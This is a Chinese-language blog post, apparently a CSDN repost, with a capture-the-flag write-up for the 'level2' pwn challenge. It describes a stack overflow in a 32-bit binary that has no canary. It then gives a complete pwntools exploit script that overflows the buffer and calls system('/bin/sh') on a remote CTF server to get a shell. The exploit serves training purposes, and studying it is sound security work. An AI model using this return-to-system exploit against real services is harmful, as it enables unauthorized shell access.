level2

其他 2021-02-09 11:31:02 阅读次数: 0

level2

这题比较有趣（难）
放linux
在这里插入图片描述
这是个32位，没有金丝雀
那么放进ida32康康

点进去康康

可以看到read函数，0x100u可以判断这是一个栈溢出
康康buf的地址

其中 s是返回函数地址，r返回
可以利用栈溢出来随意调用函数
这题要调用system函数
而system函数的参数是/bin/sh
利用 Alt +T 搜索/bin/sh的地址
找出system的地址
开始写脚本

from pwn import *
p = remote('111.198.29.45', '42945')
#system的地址 = 0x804A038
system = 0x8048320
bin_sh = 0x804A024
#/bin/sh 的地址
payload = 'a' * (0x88 + 0x04) + p32(system) + p32(0) + p32(bin_sh)
p.send(payload)
p.interactive()

得到flag
看来也不是多难

猜你喜欢

转载自blog.csdn.net/wuyvle/article/details/112974263

[XMAN]level2

JarvisOJ——level2

level2

【python challenge】Level2

jarvis oj level2

python世界level2

攻防世界 | level2

2.xss之旅—Level2

(Jarvis Oj)(Pwn) level2

Jarvis OJ [XMAN]level2

UiPath官方视频Level2

CDA Level2建模备考心得

攻防世界—pwn—level2

OWASP Uncrackable Level2 APK

[Jarvis OJ - PWN]——[XMAN]level2

Level2行情接口与level1对比优势在哪里？

Jarvis Oj Pwn 学习笔记-level2

(Jarvis Oj)(Pwn) level2(x64)

spring mvc 实现文件下载 (XMLHttpRequest Level2应用)

Jarvis OJ [XMAN]level2(x64)

交易所行情快照频率 Level2

CTF PWN [XMAN]level2(x64)

xctf--新手区--level2

攻防世界level2 x_64位

[Jarvis OJ - PWN]——[XMAN]level2(x64)

[BUUCTF]REVERSE——[WUSTCTF2020]level2

同花顺level2股票接口是什么？

怎么获取level2行情接口数据？

港股股票level2接口是不是实时？

新浪level2股票接口说明

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

循环神经网络（rnn）讲解

Tigao教程四：单独的关节运动

金蝶K3WISE15.0-注册套打教程

如何在Mac上配置Kubernetes

Android应用结束自身进程的方法

SpringMVC学习十三拦截器栈

中国驻洛杉矶总领馆举行新春招待会

HttpClient get post 发送

11 - three.js 笔记 - 绘制三维字体模型

Mysql递归获取某个父节点下面的所有子节点和子节点上的所有父节点

每日归档

更多

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)